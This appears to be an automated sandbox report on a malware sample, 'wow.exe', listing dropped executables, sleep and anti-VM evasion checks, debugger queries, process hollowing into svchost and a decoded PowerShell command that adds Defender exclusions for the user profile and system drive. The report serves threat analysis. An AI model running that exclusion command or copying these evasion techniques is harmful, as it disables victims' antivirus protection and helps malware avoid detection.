                            Source: C:\Users\user\Downloads\haus\conhost.exeDropped PE file which has not been started: C:\ProgramData\Dllhost\winlogson.exeJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24882\yarl\_quoting_c.cp311-win_amd64.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24882\propcache\_helpers_c.cp311-win_amd64.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24882\_queue.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24882\_bz2.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24882\win32\win32api.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24882\python311.dllJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24882\python3.dllJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24882\_lzma.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24882\_cffi_backend.cp311-win_amd64.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24882\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeDropped PE file which has not been started: C:\Users\user\Downloads\haus\random.exeJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24882\_ssl.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24882\multidict\_multidict.cp311-win_amd64.pydJump to dropped file
                            Source: C:\Users\user\Downloads\haus\conhost.exeDropped PE file which has not been started: C:\ProgramData\Dllhost\WinRing0x64.sysJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24882\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24882\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24882\VCRUNTIME140_1.dllJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24882\pyexpat.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24882\_socket.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24882\win32\win32evtlog.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24882\_brotli.cp311-win_amd64.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24882\unicodedata.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24882\_multiprocessing.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24882\_uuid.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24882\_overlapped.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24882\_decimal.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24882\pywin32_system32\pywintypes311.dllJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24882\_ctypes.pydJump to dropped file
                            Source: C:\Users\user\Downloads\haus\traf.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                            Source: C:\Users\user\Downloads\haus\traf.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                            Source: C:\Users\user\Downloads\haus\sel1.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_12-234
                            Source: C:\Users\user\Desktop\wow.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-18756
                            Source: C:\Users\user\Downloads\haus\ABC.exe TID: 7280Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\Downloads\haus\traf.exe TID: 7224Thread sleep count: 58 > 30
                            Source: C:\Users\user\Downloads\haus\traf.exe TID: 7292Thread sleep count: 66 > 30
                            Source: C:\Users\user\Downloads\haus\traf.exe TID: 7296Thread sleep count: 63 > 30
                            Source: C:\ProgramData\1be588a5b7\gdsun.exe TID: 7332Thread sleep count: 9997 > 30
                            Source: C:\ProgramData\1be588a5b7\gdsun.exe TID: 7332Thread sleep time: -599820000s >= -30000s
                            Source: C:\Users\user\Downloads\haus\vapo.exe TID: 8284Thread sleep time: -5534023222112862s >= -30000s
                            Source: C:\Users\user\Downloads\haus\vapo.exe TID: 8284Thread sleep time: -40602s >= -30000s
                            Source: C:\Users\user\Downloads\haus\vapo.exe TID: 8320Thread sleep count: 4288 > 30
                            Source: C:\Users\user\Downloads\haus\T.exe TID: 8740Thread sleep time: -4611686018427385s >= -30000s
                            Source: C:\Users\user\Downloads\haus\conhost.exe TID: 1780Thread sleep time: -4611686018427385s >= -30000s
                            Source: C:\Users\user\Downloads\haus\conhost.exe TID: 1780Thread sleep time: -600000s >= -30000s
                            Source: C:\Users\user\Downloads\haus\conhost.exe TID: 5684Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Downloads\haus\conhost.exe TID: 8184Thread sleep count: 835 > 30
                            Source: C:\Users\user\Downloads\haus\conhost.exe TID: 1780Thread sleep time: -599766s >= -30000s
                            Source: C:\Users\user\Downloads\haus\conhost.exe TID: 1780Thread sleep time: -599631s >= -30000s
                            Source: C:\Users\user\Downloads\haus\conhost.exe TID: 1780Thread sleep time: -599469s >= -30000s
                            Source: C:\Users\user\Downloads\haus\conhost.exe TID: 8184Thread sleep count: 195 > 30
                            Source: C:\Users\user\Downloads\haus\conhost.exe TID: 1780Thread sleep time: -599319s >= -30000s
                            Source: C:\Users\user\Downloads\haus\conhost.exe TID: 1780Thread sleep time: -599203s >= -30000s
                            Source: C:\Users\user\Downloads\haus\conhost.exe TID: 1780Thread sleep time: -599094s >= -30000s
                            Source: C:\Users\user\Downloads\haus\conhost.exe TID: 1780Thread sleep time: -598973s >= -30000s
                            Source: C:\Users\user\Downloads\haus\conhost.exe TID: 1780Thread sleep time: -598851s >= -30000s
                            Source: C:\Users\user\Downloads\haus\conhost.exe TID: 1780Thread sleep time: -598688s >= -30000s
                            Source: C:\Users\user\Downloads\haus\WatchDog.exe TID: 7748Thread sleep time: -35000s >= -30000s
                            Source: C:\Users\user\Downloads\haus\Enalib.exe TID: 7868Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\user\Downloads\haus\Enalib.exe TID: 7728Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\wscript.exe TID: 8020Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\System32\wscript.exe TID: 8188Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8080Thread sleep count: 3241 > 30
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7312Thread sleep time: -2767011611056431s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8076Thread sleep count: 276 > 30
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8152Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7872Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1432Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5372Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\vapo.exe TID: 4788Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 736Thread sleep time: -2767011611056431s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5712Thread sleep count: 496 > 30
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8468Thread sleep time: -2767011611056431s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8240Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8456Thread sleep time: -2767011611056431s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4196Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2688Thread sleep count: 430 > 30
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8492Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 616Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Downloads\haus\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
                            Source: C:\Users\user\Downloads\haus\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                            Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\Downloads\haus\vapo.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Downloads\haus\vapo.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Downloads\haus\T.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Downloads\haus\T.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Downloads\haus\Enalib.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\vapo.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80B7800 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF6D80B7800
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80B8840 FindFirstFileExW,FindClose,0_2_00007FF6D80B8840
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80D2AE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6D80D2AE4
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_05278DE0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,16_2_05278DE0
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052760E0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,16_2_052760E0
                            Source: C:\Users\user\Downloads\haus\amada2.exeCode function: 17_2_00401BF8 memset,memset,strcat,strcat,GetVersionExA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,strcat,strcat,17_2_00401BF8
                            Source: C:\Users\user\Downloads\haus\ABC.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\ProgramData\1be588a5b7\gdsun.exeThread delayed: delay time: 60000
                            Source: C:\Users\user\Downloads\haus\vapo.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Downloads\haus\T.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Downloads\haus\conhost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Downloads\haus\conhost.exeThread delayed: delay time: 600000
                            Source: C:\Users\user\Downloads\haus\conhost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Downloads\haus\conhost.exeThread delayed: delay time: 599766
                            Source: C:\Users\user\Downloads\haus\conhost.exeThread delayed: delay time: 599631
                            Source: C:\Users\user\Downloads\haus\conhost.exeThread delayed: delay time: 599469
                            Source: C:\Users\user\Downloads\haus\conhost.exeThread delayed: delay time: 599319
                            Source: C:\Users\user\Downloads\haus\conhost.exeThread delayed: delay time: 599203
                            Source: C:\Users\user\Downloads\haus\conhost.exeThread delayed: delay time: 599094
                            Source: C:\Users\user\Downloads\haus\conhost.exeThread delayed: delay time: 598973
                            Source: C:\Users\user\Downloads\haus\conhost.exeThread delayed: delay time: 598851
                            Source: C:\Users\user\Downloads\haus\conhost.exeThread delayed: delay time: 598688
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeThread delayed: delay time: 35000
                            Source: C:\Users\user\Downloads\haus\Enalib.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\vapo.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ABC.exe_31e11bf93792b57bcaa916c941cfadda12f9c15_b789ba7e_e9ba41e7-d39d-4dea-8c02-28012e458a1f\
                            Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
                            Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\
                            Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_WatchDog.exe_406a6ee21591e5a47d53f4d2912b1e35074aa74_c0f2c9f8_8caea912-d054-496b-9f7d-a459c8d4789d\
                            Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\
                            Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue
                            Source: wow.exe, 00000009.00000003.2540988639.000001D42C300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Vmwaretrat
                            Source: wow.exe, 00000000.00000003.2165582886.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
                            Source: wow.exe, 00000009.00000003.2377176921.000001D42C300000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2540988639.000001D42C300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxtray
                            Source: wow.exe, 00000009.00000003.2540988639.000001D42C300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxservice
                            Source: traf.exe, 0000000F.00000003.2263302552.00000000001D0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: vmware
                            Source: wow.exe, 00000009.00000003.2540988639.000001D42C300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Vmtoolsd
                            Source: sel1.exe, 0000000C.00000002.2272515262.0000000000401000.00000040.00000001.01000000.00000024.sdmpBinary or memory string: vmware#
                            Source: wow.exe, 00000009.00000003.2206467033.000001D427ADF000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2201197709.000001D427C10000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2203869935.000001D427BE6000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3070415917.000001D427ADE000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3083597634.000001D427C25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllze of %d bytesr
                            Source: wow.exe, 00000009.00000003.2824438649.000001D4280A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}c9
                            Source: wow.exe, 00000009.00000003.2540988639.000001D42C300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Vmwareuser
                            Source: sel1.exe, 0000000C.00000002.2272515262.0000000000401000.00000040.00000001.01000000.00000024.sdmpBinary or memory string: qemun:
                            Source: gdsun.exe, 00000012.00000002.4627880393.000000000069E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: C:\Users\user\Downloads\haus\traf.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Users\user\Downloads\haus\amada2.exeAPI call chain: ExitProcess graph end node
                            Source: C:\ProgramData\1be588a5b7\gdsun.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Users\user\Downloads\haus\Loader.exeSystem information queried: ModuleInformationJump to behavior
                            Source: C:\Users\user\Downloads\haus\ABC.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
                            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
                            Source: C:\Users\user\Downloads\haus\ABC.exeProcess queried: DebugPort
                            Source: C:\Users\user\Downloads\haus\ABC.exeProcess queried: DebugPort
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeProcess queried: DebugPort
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeProcess queried: DebugPort
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03001904 rdtsc 16_2_03001904
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80CB558 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6D80CB558
                            Source: C:\Users\user\Downloads\haus\traf.exeCode function: 15_2_0017103F LoadLibraryA,GetProcAddress,15_2_0017103F
                            Source: C:\Users\user\Downloads\haus\traf.exeCode function: 15_2_001725FD mov eax, dword ptr fs:[00000030h]15_2_001725FD
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00453540 mov eax, dword ptr fs:[00000030h]16_2_00453540
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00453540 mov eax, dword ptr fs:[00000030h]16_2_00453540
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00453540 mov eax, dword ptr fs:[00000030h]16_2_00453540
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00453060 mov eax, dword ptr fs:[00000030h]16_2_00453060
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00453060 mov eax, dword ptr fs:[00000030h]16_2_00453060
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00453060 mov eax, dword ptr fs:[00000030h]16_2_00453060
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00453060 mov eax, dword ptr fs:[00000030h]16_2_00453060
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00454610 mov eax, dword ptr fs:[00000030h]16_2_00454610
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00454610 mov eax, dword ptr fs:[00000030h]16_2_00454610
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00454610 mov eax, dword ptr fs:[00000030h]16_2_00454610
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00454610 mov eax, dword ptr fs:[00000030h]16_2_00454610
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00454410 mov eax, dword ptr fs:[00000030h]16_2_00454410
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00454410 mov eax, dword ptr fs:[00000030h]16_2_00454410
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_004556A0 mov eax, dword ptr fs:[00000030h]16_2_004556A0
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_004556A0 mov ecx, dword ptr fs:[00000030h]16_2_004556A0
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80D46F0 GetProcessHeap,0_2_00007FF6D80D46F0
                            Source: C:\Users\user\Downloads\haus\ABC.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Downloads\haus\vapo.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Downloads\haus\ABC.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Downloads\haus\T.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Downloads\haus\T.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Downloads\haus\conhost.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\vapo.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80CB558 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6D80CB558
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80BBE60 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6D80BBE60
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80BC6FC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6D80BC6FC
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80BC8A0 SetUnhandledExceptionFilter,0_2_00007FF6D80BC8A0
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_004533C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode,16_2_004533C0
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00455848 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00455848
                            Source: C:\Users\user\Downloads\haus\amada2.exeCode function: 17_2_00401100 SetUnhandledExceptionFilter,__getmainargs,_iob,_iob,_setmode,_iob,_iob,_setmode,__p__fmode,__p__environ,_cexit,ExitProcess,_iob,_setmode,_iob,17_2_00401100
                            Source: C:\ProgramData\1be588a5b7\gdsun.exeCode function: 18_2_00401100 SetUnhandledExceptionFilter,__getmainargs,_iob,_iob,_setmode,_iob,_iob,_setmode,__p__fmode,__p__environ,_cexit,ExitProcess,_iob,_setmode,_iob,18_2_00401100
                            Source: C:\Users\user\Downloads\haus\ABC.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            System process connects to network (likely due to code injection or exploit)
                            Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 18.230.108.113 80
                            Yara detected Powershell download and execute
                            Source: Yara matchFile source: amsi64_8144.amsi.csv, type: OTHER
                            Source: Yara matchFile source: amsi64_988.amsi.csv, type: OTHER
                            Source: Yara matchFile source: amsi64_8004.amsi.csv, type: OTHER
                            Encrypted powershell cmdline option found
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: Base64 decoded <#W5u#> Add-MpPreference <#xGsWJuMW#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#VnBvGE9JK#> -Force <#s8J0#>
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: Base64 decoded <#W5u#> Add-MpPreference <#xGsWJuMW#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#VnBvGE9JK#> -Force <#s8J0#>
                            Maps a DLL or memory area into another process
                            Source: C:\Users\user\Downloads\haus\sel1.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                            Source: C:\Users\user\Downloads\haus\sel1.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                            Sample uses process hollowing technique
                            Source: C:\Users\user\Downloads\haus\sel1.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 450000Jump to behavior
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Desktop\wow.exe "C:\Users\user\Desktop\wow.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Downloads\haus\Loader.exe "C:\Users\user\Downloads\haus\Loader.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Downloads\haus\sel1.exe "C:\Users\user\Downloads\haus\sel1.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Downloads\haus\ABC.exe "C:\Users\user\Downloads\haus\ABC.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Downloads\haus\traf.exe "C:\Users\user\Downloads\haus\traf.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Downloads\haus\amada2.exe "C:\Users\user\Downloads\haus\amada2.exe" Jump to behavior
